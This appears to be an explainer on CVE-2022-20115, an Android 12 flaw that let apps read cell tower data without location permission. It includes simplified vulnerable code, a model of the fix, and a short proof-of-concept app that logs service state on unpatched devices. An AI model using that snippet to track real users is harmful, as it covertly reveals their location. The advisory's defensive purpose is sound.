Overview
In 2022, security researchers uncovered a vulnerability in the Android operating system that potentially allowed malicious apps to access base station information, such as the ID of the cell tower your phone is attached to, without holding the normally required location permissions. This vulnerability, tracked as CVE-2022-20115, highlights a significant oversight in how Android manages sensitive telephony data, and it's important for both users and developers to understand how it happened and what was at risk.
This article will break down what exactly happened with this bug, provide technical details and code snippets, and examine how attackers could take advantage of the oversight.
- Affected Products: Android 12, Android 12L
- Component: TelephonyRegistry.java (frameworks/base/telephony/java/android/telephony/TelephonyRegistry.java)
- Issue: Missing permission check in broadcastServiceStateChanged
- Potential Impact: Applications without location permission could still access information about the connected cellular base station.
Background: Telephony Information and User Privacy
Typically, access to sensitive cellular information—such as Base Station Identity Code (BSIC) and Cell ID—requires apps to request and be granted location permissions, since these can indirectly reveal a device’s physical location. Android’s TelephonyRegistry class acts as a bridge, transmitting changes in the telephony system to registered listeners, but it needs to carefully control which apps get this info.
How Does the Vulnerability Work?
The vulnerable method is broadcastServiceStateChanged. This method is supposed to notify registered listeners (including third-party apps) about changes to the cellular service state, such as connecting to a new tower. However, it was discovered that the method did not enforce a location permission check on which apps could receive these notifications, even though a hand-off to a new tower is location-sensitive information.
Key Point: _Apps could register for events and get access to base station info without having the right permissions._
1. App registers a PhoneStateListener for service state changes.
2. System keeps track of listeners and, when the base station changes, calls broadcastServiceStateChanged.
3. This method sends the info to all listeners—without checking if location permission is granted.
4. An app without ACCESS_FINE_LOCATION or ACCESS_COARSE_LOCATION permissions receives cellular data that it shouldn’t.
Code Snippet: Vulnerable Section (Simplified)
Here's a simplified example, extracted from Android 12’s TelephonyRegistry.java (for demonstration):
```java
// TelephonyRegistry.java (snippet)
public void broadcastServiceStateChanged(ServiceState state, int subId, int phoneId) {
    ...
    for (Record r : mRecords) {
        // --- A per-listener location permission check is missing here ---
        try {
            // Every registered listener receives the full state, location-revealing fields included
            r.callback.onServiceStateChanged(state);
        } catch (RemoteException ex) {
            // Handle error (the remote listener process has died)
        }
    }
}
```
What’s Missing?
Before delivering the update, a check like

```java
if (!hasLocationPermission(r.pkgName, r.uid)) {
    continue; // Skip this listener: it holds no location permission
}
```

...should have protected this info.
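To make the missing gate concrete, the following is an added, self-contained Java model of the fixed delivery loop, written for this article and not taken from AOSP's TelephonyRegistry. It applies the per-listener check described above (skipping listeners without a location grant) and also shows the alternative of delivering a copy with the cell identity cleared; the `ServiceState`, `Record` and permission-lookup types are simplified stand-ins, and the package names and cell ID are constructed sample values.

```java
import java.util.ArrayList;
import java.util.List;

public class ServiceStateGate {
    // Stand-in for android.telephony.ServiceState; only the field that reveals
    // location (the cell identity) matters for this model.
    static final class ServiceState {
        final String network;
        final int cellId;
        ServiceState(String network, int cellId) { this.network = network; this.cellId = cellId; }
        // Copy with the cell identity cleared (-1 = unknown) for callers without a location grant.
        ServiceState withoutLocationInfo() { return new ServiceState(network, -1); }
    }
    // Stand-in for a listener record kept by the registry; 'received' records what was delivered.
    static final class Record {
        final String pkgName;
        final boolean hasLocationPermission; // hypothetical: result of the real PackageManager/AppOps check
        ServiceState received;
        Record(String pkgName, boolean hasLocationPermission) {
            this.pkgName = pkgName;
            this.hasLocationPermission = hasLocationPermission;
        }
    }

    // Fixed delivery loop: the permission gate runs once per listener, before each callback.
    // skipUnprivileged = true drops the listener entirely (the check the article describes);
    // false delivers a copy with the cell identity removed instead of the full state.
    static void broadcastServiceStateChanged(List<Record> records, ServiceState state, boolean skipUnprivileged) {
        for (Record r : records) {
            if (!r.hasLocationPermission) {
                if (skipUnprivileged) continue;
                r.received = state.withoutLocationInfo();
                continue;
            }
            r.received = state; // full state only for listeners holding a location grant
        }
    }

    public static void main(String[] args) {
        List<Record> records = new ArrayList<>();
        records.add(new Record("com.example.navigation", true));   // constructed: holds location permission
        records.add(new Record("com.example.flashlight", false));  // constructed: no location permission
        ServiceState state = new ServiceState("LTE", 1234567);     // constructed sample cell identity
        broadcastServiceStateChanged(records, state, false);
        for (Record r : records) {
            System.out.println(r.pkgName + " received cellId=" + r.received.cellId);
        }
    }
}
```

Running it shows the navigation listener receiving the real cell ID while the flashlight listener receives -1; passing `true` as the last argument leaves the flashlight listener with no delivery at all.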
Proof-of-Concept: Exploiting The Flaw
Here’s a simple sketch of how a malicious app could snoop on base station changes without location permissions:
```java
// Malicious app does NOT declare ACCESS_FINE_LOCATION or ACCESS_COARSE_LOCATION
import android.content.Context;
import android.os.Bundle;
import android.telephony.PhoneStateListener;
import android.telephony.ServiceState;
import android.telephony.TelephonyManager;
import android.util.Log;
import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        TelephonyManager tm = (TelephonyManager) getSystemService(Context.TELEPHONY_SERVICE);
        // PhoneStateListener is deprecated since API 31 but still delivers service state callbacks
        tm.listen(new PhoneStateListener() {
            @Override
            public void onServiceStateChanged(ServiceState serviceState) {
                super.onServiceStateChanged(serviceState);
                // On an unpatched device this logs base station info despite no location grant
                Log.d("POC", "Got service state: " + serviceState.toString());
            }
        }, PhoneStateListener.LISTEN_SERVICE_STATE);
    }
}
```
Even though this app doesn’t ask for any location permissions, it can still get updates whenever your phone switches cells, which essentially exposes your movement patterns.
Why Does This Matter?
- Location Tracking: By collecting cell tower change info and comparing it to public databases, apps could geolocate users without explicit consent.
- User Privacy Violation: As users, we expect apps to request permission before accessing location-derivable information. This flaw broke that contract.
How Was It Fixed?
After the bug was reported (Android ID: A-210118427), Google’s Android team updated the TelephonyRegistry code to ensure permission checks are strictly enforced in Android 13 and security patch levels for Android 12.
References to the Fix
- AOSP Commit: Add location check before sending base station info
- Android Security Bulletin June 2022
Original References
- Google Issue Tracker A-210118427 (May require login)
- CVE-2022-20115 at NVD
- Android Security Release Notes
How to Stay Protected
- Update Your Devices: Always install the latest Android security updates as soon as they're available.
- Be Cautious About Permissions: Even if an app doesn’t request location access, that doesn’t mean it can’t gather clues—especially on older, unpatched devices.
Conclusion
CVE-2022-20115 is a wake-up call about how complex cross-cutting permission checks are in mobile operating systems like Android. It's easy to assume that location-linked information is always guarded by permission checks, but sometimes these checks are incomplete. The fix was straightforward but critical.
If you're a developer, the takeaway is simple: always check for the relevant permissions, even for less obvious data sources.
Timeline
Published on: 05/10/2022 20:15:00 UTC
Last modified on: 05/16/2022 15:31:00 UTC